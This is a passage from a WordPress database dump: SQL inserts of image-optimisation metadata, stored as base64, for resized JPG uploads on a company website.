zNTUyOTU3LCJpZCI6MTg4NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29062, 1884, 'wpfc_optimisation_reduction', '25113'); 
INSERT INTO `wp_postmeta` VALUES (29063, 1884, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTI5NjMsImlkIjoiMTg4NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODgsInRpbWUiOjE0ODM1NTI5NjYsImlkIjoxODg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzExOCwidGltZSI6MTQ4MzU1Mjk3MCwiaWQiOjE4ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTIyLCJ0aW1lIjoxNDgzNTUyOTczLCJpZCI6MTg4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTI2MzUsInRpbWUiOjE0ODM1NTI5NzcsImlkIjoxODg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU1LCJ0aW1lIjoxNDgzNTUyOTgwLCJpZCI6MTg4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzMywidGltZSI6MTQ4MzU1Mjk4MywiaWQiOjE4ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjkwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MTIsInRpbWUiOjE0ODM1NTI5ODcsImlkIjoxODg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI5MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAzNCwidGltZSI6MTQ4MzU1Mjk5MCwiaWQiOjE4ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjYxMiwidGltZSI6MTQ4MzU1Mjk5MywiaWQiOjE4ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyOTAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDQsInRpbWUiOjE0ODM1NTI5OTksImlkIjoxODg0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29064, 1882, 'wpfc_optimisation_reduction', '21485'); 
INSERT INTO `wp_postmeta` VALUES (29065, 1882, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMwMDMsImlkIjoiMTg4MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODcsInRpbWUiOjE0ODM1NTMwMDYsImlkIjoxODgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjczOCwidGltZSI6MTQ4MzU1MzAxMCwiaWQiOjE4ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNTM3LCJ0aW1lIjoxNDgzNTUzMDE0LCJpZCI6MTg4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyODItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyODItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6OTk0OSwidGltZSI6MTQ4MzU1MzAxOCwiaWQiOjE4ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo3MTYsInRpbWUiOjE0ODM1NTMwMjEsImlkIjoxODgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTc5LCJ0aW1lIjoxNDgzNTUzMDI0LCJpZCI6MTg4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyODItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyODItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyODItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjY1MSwidGltZSI6MTQ4MzU1MzAyOCwiaWQiOjE4ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjgyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODA0LCJ0aW1lIjoxNDgzNTUzMDMxLCJpZCI6MTg4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTg2LCJ0aW1lIjoxNDgzNTUzMDM0LCJpZCI6MTg4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI4Mi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTM4LCJ0aW1lIjoxNDgzNTUzMDM4LCJpZCI6MTg4Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29066, 1881, 'wpfc_optimisation_reduction', '22337'); 
INSERT INTO `wp_postmeta` VALUES (29067, 1881, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMwNDIsImlkIjoiMTg4MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODAsInRpbWUiOjE0ODM1NTMwNDYsImlkIjoxODgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg0NywidGltZSI6MTQ4MzU1MzA0OSwiaWQiOjE4ODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNTg1LCJ0aW1lIjoxNDgzNTUzMDUzLCJpZCI6MTg4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTA2NzUsInRpbWUiOjE0ODM1NTMwNTcsImlkIjoxODgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC9